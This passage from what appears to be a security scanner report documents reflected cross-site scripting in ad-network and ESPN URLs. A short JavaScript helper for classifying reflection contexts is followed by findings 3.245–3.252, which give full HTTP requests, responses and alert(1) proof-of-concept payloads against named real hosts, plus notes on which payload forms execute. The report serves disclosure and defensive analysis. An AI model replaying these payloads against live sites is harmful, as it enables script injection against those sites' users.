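    }
  }
  return quote;
}

// Attribute-value quote state at the end of a tag fragment (text after '<').
function attrQuoteState(tag) {
  let quote = null;
  for (const c of tag) {
    if (quote) { if (c === quote) quote = null; }
    else if (c === '"' || c === "'") quote = c;
  }
  return quote;
}

// Classify the context at the end of `before` (everything up to the echo).
function classifyContext(before, contentType) {
  const lower = before.toLowerCase();
  const bodyIsScript = JS_TYPES.some(t => contentType.toLowerCase().startsWith(t));
  const open = lower.lastIndexOf('<script');
  const close = lower.lastIndexOf('</script');
  if (bodyIsScript || open > close) {
    const code = bodyIsScript ? before : before.slice(before.indexOf('>', open) + 1);
    const quote = jsStringState(code);
    return quote ? { context: 'js-string', quote } : { context: 'js-code', quote: null };
  }
  const lt = before.lastIndexOf('<');
  const gt = before.lastIndexOf('>');
  if (lt > gt) {
    const quote = attrQuoteState(before.slice(lt + 1));
    return quote ? { context: 'attr-value', quote } : { context: 'tag', quote: null };
  }
  return { context: 'html-text', quote: null };
}

// Character that must reach the response unencoded for a breakout:
// the enclosing quote for quoted contexts, '<' for text, whitespace in a tag.
function breakoutChar(ctx) {
  if (ctx.quote) return ctx.quote;
  return ctx.context === 'html-text' ? '<' : ' ';
}

function analyse(body, contentType, prefix, suffix) {
  const start = body.indexOf(prefix);
  const end = start < 0 ? -1 : body.indexOf(suffix, start + prefix.length);
  if (end < 0) return { reflected: false };
  const echoed = body.slice(start + prefix.length, end);
  const ctx = classifyContext(body.slice(0, start), contentType);
  return { reflected: true, context: ctx.context, quote: ctx.quote, echoed,
           breakoutSurvived: echoed.includes(breakoutChar(ctx)) };
}

// Constructed fragments modelled on the evidence lines of 3.238, 3.239 and
// 3.244 (shortened; not the real responses). attrEncoded is the negative case.
const SAMPLES = {
  attr: { type: 'text/html; charset=UTF-8', prefix: 'b77c1', suffix: '111d93b24a1',
    body: '<a href="?site=NWS&version=2&highlight=offb77c1" a=b 111d93b24a1">next</a>' },
  attrEncoded: { type: 'text/html; charset=UTF-8', prefix: 'b77c1', suffix: '111d93b24a1',
    body: '<a href="?site=NWS&highlight=offb77c1&quot; a=b 111d93b24a1">next</a>' },
  text: { type: 'text/html; charset=iso-8859-1', prefix: 'e3539', suffix: '45440a8342f',
    body: '<BODY>404 Not Found<HR>/frontpagee3539<script>alert(1)</script>45440a8342f/</BODY>' },
  jsString: { type: 'text/javascript', prefix: '5c463', suffix: 'ba5a810b394',
    body: 'document.write(\'<a href="http://ib.adnxs.com/click/x/cnd=!Y.5c463\'-alert(1)-\'ba5a810b394/referrer=">\');' },
};

function runSamples() {
  const out = {};
  for (const [name, s] of Object.entries(SAMPLES)) {
    out[name] = analyse(s.body, s.type, s.prefix, s.suffix);
  }
  return out;
}

if (typeof module !== 'undefined' && require.main === module) console.log(runSamples());
```

The attrEncoded case reports the same context as 3.238 but breakoutSurvived false, which is the distinction between a reflection and an injection. For 3.238 the quote did survive, so attributes can be added; a full JavaScript proof of concept would still depend on an event-handler attribute reaching the page unfiltered, which the report did not establish.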

3.245. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37b5e'%3balert(1)//d8dd3aa7398 was submitted in the redir parameter. This input was echoed as 37b5e';alert(1)//d8dd3aa7398 in the application's response.

The unencoded single quote terminates the string literal, so arbitrary JavaScript can be placed in the script. Note that the payload as echoed does not execute as-is: the // comments out the rest of the line, including the parenthesis that closes the enclosing document.write( call, so the script fails to parse. A working proof of concept keeps the expression balanced, for example the '-alert(1)-' form used against /ab in 3.244.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.glam_style&size=160x600&referrer=http%3A%2F%2Fpoponthepop.com%2F2011%2F04%2Flindsay-lohan-loses-victoria-gotti-role%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.glam_style%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-7815267_1303349054%2C11f8f328940989e%2Cent%2Cax.{PRICEBUCKET}%3B%3Bcmw%3Dowl%3Bsz%3D160x600%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D888832%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D1303349054%3F37b5e'%3balert(1)//d8dd3aa7398 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d5a43de1-76cb-482d-b60c-710bb61c0a49?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349054
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII3I4BEAoYCSAJKAkwsvqt7QQQsvqt7QQYCA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6W+Yo.b7e5'Qr*n#0-+APASPp[Bs3dk4*4W2@5sJdI5v%Y.@+!_/VvMXSE*bt=_O$3b_^wlH]t*WlBJ^1-5$V<I_9kqO#*eDcTw6zN8L)X*7P(eC)!'W$^W[Ye0fJA^f>PH-M5YB///''voY:[:'c*00u`4jlX%LRMdwxiNov]c_Z!6y@AQ$`QY; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Apr-2011 01:31:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 20-Jul-2011 01:31:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb872495=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb578898=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb793535=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 20-Jul-2011 01:31:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIsnoQChgDIAMoAzDgkb7tBBDgkb7tBBgC; path=/; expires=Wed, 20-Jul-2011 01:31:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb807732=5_[r^XI()v^qSm+!@@-#-2Yos?enc=fBSuR-F6xD8830-Nl27CPwAAAMDMzPw_PN9PjZduwj97FK5H4XrEP8IFOtoBNj05SsYda6b2ziXgiK9NAAAAAO85AwA3AQAApgEAAAIAAACKSgMAylsAAAEAAABVU0QAVVNEAKAAWAKqAQAAYw0BAgUCAAUAAAAAayTpMAAAAAA.&tt_code=cm.glam_style&udj=uf%28%27a%27%2C+6376%2C+1303349472%29%3Buf%28%27c%27%2C+51148%2C+1303349472%29%3Buf%28%27r%27%2C+215690%2C+1303349472%29%3B&cnd=!PRdGYAjMjwMQipUNGAAgyrcBKAAxexSuR-F6xD9CEwgAEAAYACABKP7__________wFCCwi2VBAAGAAgAigBSABQAFiqA2AAaKYD; path=/; expires=Fri, 22-Apr-2011 01:31:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 20-Jul-2011 01:31:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6W+Yo.b7e5'Qr*n#0-+APASPp[Bs3dk4*4W2@5sJdI5v1GC]*tl9F+2rnTs2'wY3a$51gemJ/CoLs<*HUUHQvxi5SmZ/^cQAam9WQBG*g6o3dX6<lo=s9OS7yRn<vC(c@*$3837T1R`mJH<k+phc8pZhitq]xK]M_@k?eip%]%?]u'kjIO6(>S:; path=/; expires=Wed, 20-Jul-2011 01:31:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Apr 2011 01:31:12 GMT
Content-Length: 428

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.glam_style/;net=cm;u=,cm-7815267_1303349054,11f8f328940989e,ent,ax.1;;cmw=owl;sz=160x600;net=cm;env=ifr;ord1=888832;contx=ent;an=1;dc=w;btg=;ord=1303349054?37b5e';alert(1)//d8dd3aa7398">
...[SNIP]...

3.246. http://img.mediaplex.com/content/0/15017/124821/VNX_Direct_1a_728x90_SIMPLE_v2_phone.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15017/124821/VNX_Direct_1a_728x90_SIMPLE_v2_phone.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d86c"-alert(1)-"09d3c1b00c was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15017/124821/VNX_Direct_1a_728x90_SIMPLE_v2_phone.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-124821-28408-1%3Fmpt%3D31620111024d86c"-alert(1)-"09d3c1b00c&mpt=3162011102&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 11:33:25 GMT
Server: Apache
Last-Modified: Tue, 15 Mar 2011 17:30:07 GMT
ETag: "3bcf0b-ea9-49e88c78585c0"
Accept-Ranges: bytes
Content-Length: 4083
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" src=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

(function(){
var protocol = window.location.protocol;
if (protocol == "https
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15017-124821-28408-1%3Fmpt%3D31620111024d86c"-alert(1)-"09d3c1b00c");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F15017-124821-28408-1%3Fmpt%3D31620111024d86c"-alert(1)-"09d3c1b00c");
mpck =
...[SNIP]...

3.247. http://img.mediaplex.com/content/0/15017/124821/VNX_Direct_1a_728x90_SIMPLE_v2_phone.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15017/124821/VNX_Direct_1a_728x90_SIMPLE_v2_phone.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fc46"%3balert(1)//b5d197bd84e was submitted in the mpvc parameter. This input was echoed as 5fc46";alert(1)//b5d197bd84e in the application's response.

The unencoded double quote terminates the string literal, so arbitrary JavaScript can be placed in the script. Note that the payload as echoed does not execute as-is: it lands inside the argument of encodeURIComponent( and the // comments out the closing parenthesis, so the script fails to parse. The balanced "-alert(1)-" form used against the mpck parameter of this same script in 3.246 executes.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15017/124821/VNX_Direct_1a_728x90_SIMPLE_v2_phone.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15017-124821-28408-1%3Fmpt%3D3162011102&mpt=3162011102&mpvc=5fc46"%3balert(1)//b5d197bd84e HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 11:33:29 GMT
Server: Apache
Last-Modified: Tue, 15 Mar 2011 17:30:07 GMT
ETag: "3bcf0b-ea9-49e88c78585c0"
Accept-Ranges: bytes
Content-Length: 4089
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" src=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

(function(){
var protocol = window.location.protocol;
if (protocol == "https
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("5fc46";alert(1)//b5d197bd84e");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("5fc46";alert(1)//b5d197bd84e");
mpvc = encodeURIComponent(mpvclick2);
}
else
{
mpvc = ("5fc46"%3balert(1)//b5d197bd84e");
...[SNIP]...

3.248. http://img.mediaplex.com/content/0/3484/119769/81842_EXF000FL__BIGBRAND_v02__728x90.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3484/119769/81842_EXF000FL__BIGBRAND_v02__728x90.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2aed4"%3balert(1)//9d15426f494 was submitted in the mpck parameter. This input was echoed as 2aed4";alert(1)//9d15426f494 in the application's response.

The unencoded double quote terminates the string literal, so arbitrary JavaScript can be placed in the script. Note that the payload as echoed does not execute as-is: the // comments out the rest of the line, including whatever closes the call that the string literal is an argument of, so the script fails to parse. A working proof of concept keeps the expression balanced, for example the "-alert(1)-" form used in 3.246.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3484/119769/81842_EXF000FL__BIGBRAND_v02__728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F3484-119769-15222-231%2F15%3Fmpt%3D1041069426%26siteid%3D0%26adid%3D462001%26fcid%3D462001%26so_ustat%3D4%26ir_DAP_I131%3D4%26ir_DAP_I132%3D1%26ir_DAP_I133%3D%26ir_DAP_I5%3D0%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D2260806429192aed4"%3balert(1)//9d15426f494&mpt=1041069426&siteid=0&adid=462001&fcid=462001&so_ustat=4&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=226080642919&mpvc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253DL%2526ai%253DBwUJx96GtTYznHYrJsQfyyZneAp2t35ECtcav8x3AjbcBwOGYAhABGAEgvs7lDTgAUM6Bz4IDYMnug4jwo-wSsgEGeHNzLmN4ugEJNzI4eDkwX2FzyAEJ2gFVaHR0cDovL3hzcy5jeC9leGFtcGxlcy9kb3JrL3hzcy9zdG9yZWQtcmVmbGVjdGVkLXhzcy1zcWwtaW5qZWN0aW9uLXJlcHV0YXRpb25jb20uaHRtbLgCGMgC6_TPDKgDAdEDHROmdxAz1pjoA6YD6AMF9QMAAADE%2526num%253D1%2526sig%253DAGiWqtzwxnWJMgCOmYGbqZNq2knEzeN17g%2526client%253Dca-pub-4063878933780912%2526adurl%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303242819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fdork%2Fxss%2Fstored-reflected-xss-sql-injection-reputationcom.html&dt=1303224864012&bpp=3&shv=r20110414&jsv=r20110412&correlator=1303224864124&frm=0&adk=1607234649&ga_vid=1414392798.1303224865&ga_sid=1303224865&ga_hid=1469206436&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1317&bih=1003&fu=0&ifi=1&dtd=508&xpc=H1SUBNINVm&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 14:54:40 GMT
Server: Apache
Last-Modified: Wed, 09 Feb 2011 17:18:36 GMT
ETag: "69ef39-c38-49bdca7baf300"
Accept-Ranges: bytes
Content-Length: 5810
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mpck_encode = "rover.ebay.com%2Frover%2F1%2F3484-119769-15222-231%2F15%3Fmpt%3D1041069426%26siteid%3D0%26adid%3D462001%26fcid%3D462001%26so_ustat%3D4%26ir_DAP_I131%
...[SNIP]...
over/1/3484-119769-15222-231/15?mpt=1041069426&siteid=0&adid=462001&fcid=462001&so_ustat=4&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=2260806429192aed4";alert(1)//9d15426f494\" TARGET=\"_blank\">
...[SNIP]...

3.249. http://img.mediaplex.com/content/0/3484/119769/81842_EXF000FL__BIGBRAND_v02__728x90.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3484/119769/81842_EXF000FL__BIGBRAND_v02__728x90.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59608"%3balert(1)//758f25329e2 was submitted in the mpvc parameter. This input was echoed as 59608";alert(1)//758f25329e2 in the application's response.

The unencoded double quote terminates the string literal, so arbitrary JavaScript can be placed in the script. Note that the payload as echoed does not execute as-is: the // comments out the rest of the line, including the concatenation with mpck_encode and whatever closes the enclosing call, so the script fails to parse. A working proof of concept keeps the expression balanced, for example the "-alert(1)-" form used in 3.246.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3484/119769/81842_EXF000FL__BIGBRAND_v02__728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F3484-119769-15222-231%2F15%3Fmpt%3D1041069426%26siteid%3D0%26adid%3D462001%26fcid%3D462001%26so_ustat%3D4%26ir_DAP_I131%3D4%26ir_DAP_I132%3D1%26ir_DAP_I133%3D%26ir_DAP_I5%3D0%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26rvr_id%3D226080642919&mpt=1041069426&siteid=0&adid=462001&fcid=462001&so_ustat=4&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&rvr_id=226080642919&mpvc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253DL%2526ai%253DBwUJx96GtTYznHYrJsQfyyZneAp2t35ECtcav8x3AjbcBwOGYAhABGAEgvs7lDTgAUM6Bz4IDYMnug4jwo-wSsgEGeHNzLmN4ugEJNzI4eDkwX2FzyAEJ2gFVaHR0cDovL3hzcy5jeC9leGFtcGxlcy9kb3JrL3hzcy9zdG9yZWQtcmVmbGVjdGVkLXhzcy1zcWwtaW5qZWN0aW9uLXJlcHV0YXRpb25jb20uaHRtbLgCGMgC6_TPDKgDAdEDHROmdxAz1pjoA6YD6AMF9QMAAADE%2526num%253D1%2526sig%253DAGiWqtzwxnWJMgCOmYGbqZNq2knEzeN17g%2526client%253Dca-pub-4063878933780912%2526adurl%253D59608"%3balert(1)//758f25329e2 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303242819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fdork%2Fxss%2Fstored-reflected-xss-sql-injection-reputationcom.html&dt=1303224864012&bpp=3&shv=r20110414&jsv=r20110412&correlator=1303224864124&frm=0&adk=1607234649&ga_vid=1414392798.1303224865&ga_sid=1303224865&ga_hid=1469206436&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1317&bih=1003&fu=0&ifi=1&dtd=508&xpc=H1SUBNINVm&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; mojo2=16228:26209; mojo3=15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 14:54:42 GMT
Server: Apache
Last-Modified: Wed, 09 Feb 2011 17:18:36 GMT
ETag: "69ef39-c38-49bdca7baf300"
Accept-Ranges: bytes
Content-Length: 5892
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mpck_encode = "rover.ebay.com%2Frover%2F1%2F3484-119769-15222-231%2F15%3Fmpt%3D1041069426%26siteid%3D0%26adid%3D462001%26fcid%3D462001%26so_ustat%3D4%26ir_DAP_I131%
...[SNIP]...
VjdGVkLXhzcy1zcWwtaW5qZWN0aW9uLXJlcHV0YXRpb25jb20uaHRtbLgCGMgC6_TPDKgDAdEDHROmdxAz1pjoA6YD6AMF9QMAAADE%26num%3D1%26sig%3DAGiWqtzwxnWJMgCOmYGbqZNq2knEzeN17g%26client%3Dca-pub-4063878933780912%26adurl%3D59608";alert(1)//758f25329e2http://"+mpck_encode+"\">
...[SNIP]...

3.250. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7779"-alert(1)-"ca5dadfbf4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=42457&type=lead&f7779"-alert(1)-"ca5dadfbf4a=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: imp.fetchback.com
Cookie: cmp=1_1299095619; uid=1_1299095619_1299095619157:6828272180648290; kwd=1_1299095619; sit=1_1299095619_3289:0:0; cre=1_1299095619; bpd=1_1299095619_h9km:0; apd=1_1299095619; scg=1_1299095619; ppd=1_1299095619; afl=1_1299095619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:16:58 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1303179418_1299095619157:6828272180648290; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:16:58 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 19 Apr 2011 02:16:58 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 233

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=42457&type=lead&f7779"-alert(1)-"ca5dadfbf4a=1' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.251. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e663"-alert(1)-"84ad3df84ce was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/fb/adtag.js?tid=42457&type=lead7e663"-alert(1)-"84ad3df84ce HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: imp.fetchback.com
Cookie: cmp=1_1299095619; uid=1_1299095619_1299095619157:6828272180648290; kwd=1_1299095619; sit=1_1299095619_3289:0:0; cre=1_1299095619; bpd=1_1299095619_h9km:0; apd=1_1299095619; scg=1_1299095619; ppd=1_1299095619; afl=1_1299095619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:16:21 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1303179381_1299095619157:6828272180648290; Domain=.fetchback.com; Expires=Sun, 17-Apr-2016 02:16:21 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 19 Apr 2011 02:16:21 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 230

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=42457&type=lead7e663"-alert(1)-"84ad3df84ce' width='728' height='90' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...

3.252. http://insider.espn.go.com/mlb/blog [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://insider.espn.go.com
Path:   /mlb/blog

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a47a"><script>alert(1)</script>c61540aaab8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /mlb/blog?name=stark_jayson&id=6154671&3a47a"><script>alert(1)</script>c61540aaab8=1 HTTP/1.1
Host: insider.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:13:25 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: EGW06
Set-Cookie: SWID=6E9C9082-DD07-42E9-8207-8AAC74C9B6A1; path=/; expires=Sat, 26-Feb-2031 02:13:25 GMT; domain=.go.com;
Cache-Expires: Sat, 26 Feb 2011 02:18:25 GMT
Content-Length: 63928
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; expires=Tue, 08 Mar 2011 02:13:25 GMT; Path=/; Domain=.go.com
Connection: close
Via: 8810-05/06
Vary: Accept-Encoding

